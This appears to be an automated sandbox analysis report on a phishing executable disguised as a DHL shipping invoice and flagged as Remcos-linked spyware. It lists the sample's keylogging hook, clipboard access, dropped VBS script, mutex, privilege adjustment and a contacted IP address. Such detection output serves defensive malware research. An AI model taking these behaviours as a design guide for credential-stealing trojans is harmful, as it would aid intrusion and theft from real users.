              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://www.xboxab.com/ab?gameid=AC70E74F8D1044C5894D0DC261838A8D
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
              Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
              Source: unknownHTTPS traffic detected: 109.99.162.14:443 -> 192.168.11.30:49832 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 2_2_00405461 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_00405461
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_0040987A
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,5_2_004098E2
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,6_2_00406DFC
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,6_2_00406E9F
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 7_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,7_2_004068B5
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 7_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,7_2_004072B5

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000004.00000002.423794222336.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.423629557045.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.423702210512.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe PID: 9056, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              System Summary

              barindex
              Source: initial sampleStatic PE information: Filename: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
              Source: initial sampleStatic PE information: Filename: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,5_2_0040DD85
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_00401806 NtdllDefWindowProc_W,5_2_00401806
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_004018C0 NtdllDefWindowProc_W,5_2_004018C0
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_004016FD NtdllDefWindowProc_A,6_2_004016FD
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_004017B7 NtdllDefWindowProc_A,6_2_004017B7
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 7_2_00402CAC NtdllDefWindowProc_A,7_2_00402CAC
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 7_2_00402D66 NtdllDefWindowProc_A,7_2_00402D66
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 2_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040338F
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_0040338F
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 2_2_00406B152_2_00406B15
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 2_2_004072EC2_2_004072EC
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 2_2_00404C9E2_2_00404C9E
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 2_2_73A41B5F2_2_73A41B5F
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_00406B154_2_00406B15
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_004072EC4_2_004072EC
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_00404C9E4_2_00404C9E
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_3465B5C14_2_3465B5C1
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_346671944_2_34667194
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_0044B0405_2_0044B040
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_0043610D5_2_0043610D
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_004473105_2_00447310
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_0044A4905_2_0044A490
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_0040755A5_2_0040755A
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_0043C5605_2_0043C560
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_0044B6105_2_0044B610
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_0044D6C05_2_0044D6C0
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_004476F05_2_004476F0
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_0044B8705_2_0044B870
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_0044081D5_2_0044081D
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_004149575_2_00414957
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_004079EE5_2_004079EE
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_00407AEB5_2_00407AEB
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_0044AA805_2_0044AA80
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_00412AA95_2_00412AA9
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_00404B745_2_00404B74
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_00404B035_2_00404B03
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_0044BBD85_2_0044BBD8
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_00404BE55_2_00404BE5
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_00404C765_2_00404C76
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_00415CFE5_2_00415CFE
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_00416D725_2_00416D72
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_00446D305_2_00446D30
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_00446D8B5_2_00446D8B
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_00406E8F5_2_00406E8F
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_004050386_2_00405038
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_0041208C6_2_0041208C
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_004050A96_2_004050A9
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_0040511A6_2_0040511A
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_0043C13A6_2_0043C13A
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_004051AB6_2_004051AB
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_004493006_2_00449300
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_0040D3226_2_0040D322
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_0044A4F06_2_0044A4F0
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_0043A5AB6_2_0043A5AB
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_004136316_2_00413631
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_004466906_2_00446690
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_0044A7306_2_0044A730
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_004398D86_2_004398D8
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_004498E06_2_004498E0
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_0044A8866_2_0044A886
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_0043DA096_2_0043DA09
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_00438D5E6_2_00438D5E
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_00449ED06_2_00449ED0
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_0041FE836_2_0041FE83
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_00430F546_2_00430F54
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 7_2_004050C27_2_004050C2
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 7_2_004014AB7_2_004014AB
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 7_2_004051337_2_00405133
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 7_2_004051A47_2_004051A4
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 7_2_004012467_2_00401246
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 7_2_0040CA467_2_0040CA46
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 7_2_004052357_2_00405235
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 7_2_004032C87_2_004032C8
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 7_2_004222D97_2_004222D9
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 7_2_004016897_2_00401689
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 7_2_00402F607_2_00402F60
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: String function: 004165FF appears 34 times
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: String function: 00402C41 appears 51 times
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: String function: 00416760 appears 69 times
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000003.423680232682.0000000002E45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423808236953.000000003463B000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423807692654.0000000033DC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423807692654.0000000033DC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeBinary or memory string: OriginalFileName vs DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeBinary or memory string: OriginalFilename vs DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000007.00000002.423683491300.000000000041B000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@11/13@3/3
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,5_2_004182CE
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 2_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040338F
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_0040338F
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 7_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,7_2_00410DE1
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 2_2_00404722 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,2_2_00404722
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,5_2_00413D4C
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 2_2_00402104 CoCreateInstance,2_2_00402104
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,5_2_0040B58D
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Livmoderens15Jump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeMutant created: \Sessions\1\BaseNamedObjects\wealthymannow-B8Y1BS
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsx7B7B.tmpJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\hoaxbtopiw.vbs"
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423807908275.0000000034530000.00000040.10000000.00040000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
